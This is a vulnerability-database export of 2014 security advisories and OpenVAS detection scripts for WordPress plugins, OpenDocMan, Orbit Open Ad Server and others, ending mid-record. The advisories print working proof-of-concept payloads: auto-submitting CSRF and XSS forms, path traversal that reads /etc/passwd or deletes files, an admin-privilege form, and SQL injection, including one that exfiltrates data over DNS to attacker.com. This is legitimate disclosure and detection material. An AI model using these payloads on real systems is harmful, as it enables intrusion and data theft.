{"htbridge": [{"lastseen": "2017-06-23T23:08:14", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete arbitrary files. \n \n1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905 \nVideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snapshots.php\". A remote attacker can upload and execute arbitrary PHP file on the target system. \nThe following PoC code demonstrates exploitation of the vulnerability: \nAfter successful exploitation the remote shell will be accessible via the following URL: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ snapshots/1.php.jpg \nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension. \n \n2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906 \n2.1 The vulnerability exists due to insufficient filtration of \"m\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits a page with enabled plugin\u2019s widget. The script will be also executed in administrative section on the following page: \nhttp://[host]/wp-admin/options-general.php?page=videowhisper_streaming.php&t ab=live \nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word: \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integra tion/ls/lb_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"u\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"m\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n \n2.2 The vulnerability exists due to insufficient filtration of \"msg\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits the affected page. \nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word: \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integra tion/ls/vc_chatlog.php\" method=\"post\"> \n<input type=\"hidden\" name=\"msg\" value=\"<script>alert('immuniweb')</script>\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n</form> \n</body> \nThe code will be executed when the user visits the following URL: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ uploads/[room]/Log[date].html \nWhere [room] is set by HTTP POST parameter r and [date] is the current date. \n \n2.3 The vulnerabilities exist due to insufficient filtration of \"n\" HTTP GET parameter passed to scripts \"channel.php\", \"htmlchat.php\", \"video.php\" and \"videotext.php\" within the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/\" directory. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \n2.4 The vulnerability exists due to insufficient filtration of \"message\" HTTP GET parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3 E \n2.5 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integra tion/ls/lb_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n2.6 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integra tion/ls/v_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n \n3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907 \n \n3.1 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php\" script. A remote attacker can view contents of arbitrary files on the target system using directory traversal sequences. \nThe exploitation example below displays contents of \"/etc/passwd\" file: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ rtmp_login.php?s=../../../../../../etc/passwd \n3.2 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php\" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences. \nThe exploitation example below deletes a file \"/tmp/immuniweb\": \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ rtmp_logout.php?s=../../../../../../../../tmp/immuniweb \nSuccessful exploitation of this vulnerability requires that file \"/tmp/immuniweb\" exists on the system. \n \n4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908 \n4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and gain knowledge of full installation path of the application. \nThe following URL can be used to gain knowledge of full installation path of the application: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/bp. php \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/vid eowhisper_streaming.php \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ rtmp.inc.php \n\n", "modified": "2014-02-07T00:00:00", "published": "2014-02-06T00:00:00", "id": "HTB23199", "href": "https://www.htbridge.com/advisory/HTB23199", "type": "htbridge", "title": "Multiple Vulnerabilities in VideoWhisper Live Streaming Integration WP Plugin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C/"}}, {"lastseen": "2017-06-23T23:08:36", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application. \n \n1) SQL Injection in OpenDocMan: CVE-2014-1945 \nThe vulnerability exists due to insufficient validation of \"add_value\" HTTP GET parameter in \"/ajax_udf.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \nThe exploitation example below displays version of the MySQL server: \nhttp://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,versi on%28%29,3,4,5,6,7,8,9 \n \n2) Improper Access Control in OpenDocMan: CVE-2014-1946 \nThe vulnerability exists due to insufficient validation of allowed action in \"/signup.php\" script when updating user\u2019s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application. \nThe exploitation example below assigns administrative privileges for the current account: \n<form action=\"http://[host]/signup.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"updateuser\" value=\"1\"> \n<input type=\"hidden\" name=\"admin\" value=\"1\"> \n<input type=\"hidden\" name=\"id\" value=\"[USER_ID]\"> \n<input type=\"submit\" name=\"login\" value=\"Run\"> \n</form>\n", "modified": "2014-02-25T00:00:00", "published": "2014-02-12T00:00:00", "id": "HTB23202", "href": "https://www.htbridge.com/advisory/HTB23202", "type": "htbridge", "title": "Multiple Vulnerabilities in OpenDocMan", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}, {"lastseen": "2017-06-23T23:08:14", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of vulnerable website. \n \n\u0421ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340 \nThe vulnerability exists due to insufficient verification of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a website backup. \nSimple exploit code below will create new backup with all website files (no SQL database), which will be publicly accessible on the http://[host]/administrator/backups/backup.tar URL: \n<form action=\"http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_clon er&task=confirm\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"dbbackup\" value=\"1\"> \n<input type=\"hidden\" name=\"dbbackup_comp\" value=\"\"> \n<input type=\"hidden\" name=\"bname\" value=\"backup\"> \n<input type=\"hidden\" name=\"backupComments\" value=\"\"> \n<input type=\"hidden\" name=\"option\" value=\"com_cloner\"> \n<input type=\"hidden\" name=\"task\" value=\"generate\"> \n<input type=\"hidden\" name=\"boxchecked\" value=\"0\"> \n<input type=\"hidden\" name=\"hidemainmenu\" value=\"0\"> \n<input type=\"hidden\" name=\"\" value=\"\"> \n<input type=\"submit\" name=\"run\" value=\"run\"> \n</form> \n<script> \ndocument.main.submit(); \n</script>\n", "modified": "2014-03-13T00:00:00", "published": "2014-03-12T00:00:00", "id": "HTB23206", "href": "https://www.htbridge.com/advisory/HTB23206", "type": "htbridge", "title": "\u0421ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N/"}}, {"lastseen": "2017-06-23T23:08:17", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in CMSimple, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n1) Reflected Cross-Site Scripting (XSS) in CMSimple: CVE-2014-2219 \nThe vulnerability exists due to insufficient sanitisation of user-supplied data in \"d\" HTTP GET parameter passed to \"/whizzywig/wb.php\" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThe exploitation example below uses the JavaScript \"alert()\" function to display \"immuniweb\" word: \nhttp://[host]/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27immuniweb%27%2 9;%3C/script%3E \n\n", "modified": "2014-02-26T00:00:00", "published": "2014-02-26T00:00:00", "id": "HTB23205", "href": "https://www.htbridge.com/advisory/HTB23205", "type": "htbridge", "title": "Cross-Site Scripting (XSS) in CMSimple", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2017-06-23T23:08:33", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in Orbit Open Ad Server, which can be exploited to perform SQL Injection attacks, alter SQL requests to database of vulnerable application and potentially gain control over the vulnerable website. \n1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540 \nInput passed via the \"site_directory_sort_field\" HTTP POST parameter to \"/guest/site_directory\" URL is not properly sanitised before being used in SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL commands. \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\"> \n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\"> \n<input type=\"hidden\" name=\"category_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\"> \n<input type=\"hidden\" name=\"form_mode\" value=\"save\"> \n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\"> \n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\"> \n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\"> \n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(select load_file(CONCAT(CHAR(92), CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111), CHAR(111),CHAR(98),CHAR(97),CHAR(114))))\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \nThe second PoC code works against any platform (UNIX/Windows) and uses blind SQL injection brute-force (dichotomy) technique to extract data from the database: \n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\"> \n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\"> \n<input type=\"hidden\" name=\"category_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\"> \n<input type=\"hidden\" name=\"form_mode\" value=\"save\"> \n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\"> \n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\"> \n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\"> \n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))\"> \n<input type=\"submit\" id=\"btn\"> \n</form>\n", "modified": "2014-04-08T00:00:00", "published": "2014-03-19T00:00:00", "id": "HTB23208", "href": "https://www.htbridge.com/advisory/HTB23208", "type": "htbridge", "title": "SQL Injection in Orbit Open Ad Server", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}, {"lastseen": "2017-06-23T23:08:34", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks. \n \n1) SQL Injection in AdRotate: CVE-2014-1854 \nThe vulnerability exists due to insufficient validation of \"track\" HTTP GET parameter passed to \n\"/wp-content/plugins/adrotate/library/clicktracker.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \nThe following PoC code contains a base64-encoded string \"-1 UNION SELECT version(),1,1,1\", which will be injected into SQL query and will output MySQL server version: \nhttp://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTE gVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ== \nSuccessful exploitation will result in redirection to local URI that contains version of the MySQL server: \nhttp://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log \n\n", "modified": "2014-01-31T00:00:00", "published": "2014-01-30T00:00:00", "id": "HTB23201", "href": "https://www.htbridge.com/advisory/HTB23201", "type": "htbridge", "title": "SQL Injection in AdRotate", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}], "openvas": [{"lastseen": "2018-10-22T16:40:51", "bulletinFamily": "scanner", "description": "This host is installed with Wordpress VideoWhisper Live Streaming Integration\nPlugin and is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2014-04-01T00:00:00", "id": "OPENVAS:1361412562310804530", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804530", "title": "WordPress VideoWhisper Live Streaming Integration Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wordpress_videowhisper_mult_vuln.nasl 35802 2014-04-01 12:28:38Z Apr$\n#\n# WordPress VideoWhisper Live Streaming Integration Multiple Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804530\");\n script_version(\"$Revision: 11867 $\");\n script_cve_id(\"CVE-2014-1906\", \"CVE-2014-1907\", \"CVE-2014-1905\", \"CVE-2014-1908\");\n script_bugtraq_id(65876, 65877, 65866, 65880);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:48:11 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-01 12:28:38 +0530 (Tue, 01 Apr 2014)\");\n script_name(\"WordPress VideoWhisper Live Streaming Integration Multiple Vulnerabilities\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Wordpress VideoWhisper Live Streaming Integration\nPlugin and is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP GET request and check whether it is able to read\ncookie or not.\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to an,\n\n - Improper verification of file extensions before uploading files to the server\n in '/videowhisper-live-streaming-integration/ls/vw_snapshots.php'\n\n - Input passed via HTTP POST parameters 'msg' to /ls/vc_chatlog.php, 'm' to\n /ls/lb_status.php, 'ct' to /ls/lb_status.php and /ls/v_status.php.\n\n - Input passed via HTTP GET parameters 'n' to /ls/channel.php, htmlchat.php,\n ls/video.php, and /videotext.php, 'message' to /ls/lb_logout.php, and 's'\n to rtmp_login.php and rtmp_logout.php scripts.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary HTML and\nscript code in a user's browser session in the context of an affected site and\nread/delete arbitrary files.\");\n script_tag(name:\"affected\", value:\"WordPress VideoWhisper Live Streaming Integration Plugin version 4.27.3\nand probably prior.\");\n script_tag(name:\"solution\", value:\"Upgrade to version 4.29.5 or later.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31986\");\n script_xref(name:\"URL\", value:\"https://www.htbridge.com/advisory/HTB23199\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/125454\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n script_xref(name:\"URL\", value:\"http://wordpress.org/plugins/videowhisper-live-streaming-integration\");\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nurl = dir + '/wp-content/plugins/videowhisper-live-streaming-integration/ls'+\n '/channel.php?n=</title><script>alert(document.cookie)</script>';\n\nif(http_vuln_check(port:http_port, url:url, check_header:TRUE,\n pattern:\"<script>alert\\(document.cookie\\)</script>\",\n extra_check:'>Video Whisper Live Streaming<'))\n{\n security_message(http_port);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:41:16", "bulletinFamily": "scanner", "description": "This host is installed with WordPress AdRotate Plugin and is prone to sql\ninjection vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2014-03-11T00:00:00", "id": "OPENVAS:1361412562310804511", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804511", "title": "WordPress AdRotate Plugin 'clicktracker.php' SQL Injection Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wordpress_adrotate_track_pram_sqli_vul.nasl 11974 2018-10-19 06:22:46Z cfischer $\n#\n# WordPress AdRotate Plugin 'clicktracker.php' SQL Injection Vulnerability\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804511\");\n script_version(\"$Revision: 11974 $\");\n script_cve_id(\"CVE-2014-1854\");\n script_bugtraq_id(65709);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 08:22:46 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-11 11:17:52 +0530 (Tue, 11 Mar 2014)\");\n script_name(\"WordPress AdRotate Plugin 'clicktracker.php' SQL Injection Vulnerability\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with WordPress AdRotate Plugin and is prone to sql\ninjection vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted exploit string via HTTP GET request and check whether it is\npossible to execute sql query or not.\");\n script_tag(name:\"insight\", value:\"Flaw is due to the library/clicktracker.php script not properly sanitizing\nuser-supplied input to the 'track' parameter.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to inject or manipulate SQL\nqueries in the back-end database, allowing for the manipulation or disclosure\nof arbitrary data.\");\n script_tag(name:\"affected\", value:\"Wordpress AdRotate Pro plugin version 3.9 through 3.9.5 and AdRotate Free\nplugin version 3.9 through 3.9.4\");\n script_tag(name:\"solution\", value:\"Upgrade AdRotate Pro to version 3.9.6 or higher and AdRotate Free to version\n3.9.5 or higher.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57079\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31834\");\n script_xref(name:\"URL\", value:\"https://www.htbridge.com/advisory/HTB23201\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/125330\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n script_xref(name:\"URL\", value:\"http://www.adrotateplugin.com\");\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nurl = dir + '/wp-content/plugins/adrotate/library/clicktracker.php?track=LT' +\n 'EgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ==';\n\nreq = http_get(item:url, port:http_port);\nres = http_keepalive_send_recv(port:http_port, data:req, bodyonly:FALSE);\n\nif(res && res =~ \"HTTP/1.. 302 Found\" && res =~ \"Location: ([0-9.]+)\")\n{\n security_message(http_port);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:54:53", "bulletinFamily": "scanner", "description": "Check for the Version of bugzilla", "modified": "2018-04-06T00:00:00", "published": "2014-05-05T00:00:00", "id": "OPENVAS:1361412562310867769", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867769", "title": "Fedora Update for bugzilla FEDORA-2014-5414", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bugzilla FEDORA-2014-5414\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867769\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-05 11:17:13 +0530 (Mon, 05 May 2014)\");\n script_cve_id(\"CVE-2014-1517\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_name(\"Fedora Update for bugzilla FEDORA-2014-5414\");\n\n tag_insight = \"Bugzilla is a popular bug tracking system used by multiple open source projects\nIt requires a database engine installed - either MySQL, PostgreSQL or Oracle.\nWithout one of these database engines (local or remote), Bugzilla will not work\n- see the Release Notes for details.\n\";\n\n tag_affected = \"bugzilla on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-5414\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/132281.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of bugzilla\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"bugzilla\", rpm:\"bugzilla~4.2.9~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-22T16:40:24", "bulletinFamily": "scanner", "description": "Apache Archiva is prone to multiple remote command-execution\nvulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2014-01-15T00:00:00", "id": "OPENVAS:1361412562310103883", "href": 